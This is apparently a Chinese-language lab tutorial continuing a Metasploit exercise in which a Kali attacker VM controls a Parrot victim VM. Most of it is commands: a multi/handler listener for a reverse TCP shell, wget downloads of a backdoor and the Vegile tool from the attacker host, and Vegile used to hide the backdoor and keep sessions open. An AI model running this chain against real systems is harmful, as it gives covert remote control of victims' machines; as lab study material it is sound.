哈囉~
昨天我們用msfvenom建立了一個後門,
將其傳送到受害端的主機,
只要受害端運行了該程式,
就會建立TCP連線,並自動連回我們的主機。
我們便可以透過連線來控制目標。
另外,也透過git clone把Vegile下載到電腦。
今天就來接續昨天的實作吧~
環境:
Kali ─ 攻擊方(192.168.168.131)
Parrot ─ 受害方(192.168.168.129)
將昨天的 後門 & Vegile 都移至/var/ww/html目錄下。
cp backdoor /var/www/html
cp -r Vegile /var/www/html
為了模擬從受害端連回去server下載工具,記得要啟動apache。
systemctl start apache2
接下來我們執行msf控制台,使用exploit/multi/handler開始監聽。
msfconsole
use exploit/multi/handler
set payload linux/x64/shell/reverse_tcp
set lhost [要連回的攻擊者ip]
set lport 777
run
wget [攻擊者ip]/Vegile
wget [攻擊者ip]/backdoor
Vegile --i backdoor
時發現有錯誤...chmod +x Vegile
chmod +x backdoor
./Vegile --i backdoor
Vegile這個工具的指令其實很簡單,
只有以下三個參數:
參數 | 說明 |
---|---|
-i | 隱藏後門 |
-u | 開啟無限Session |
-h | 功能查詢 |
走囉! 高歌離席~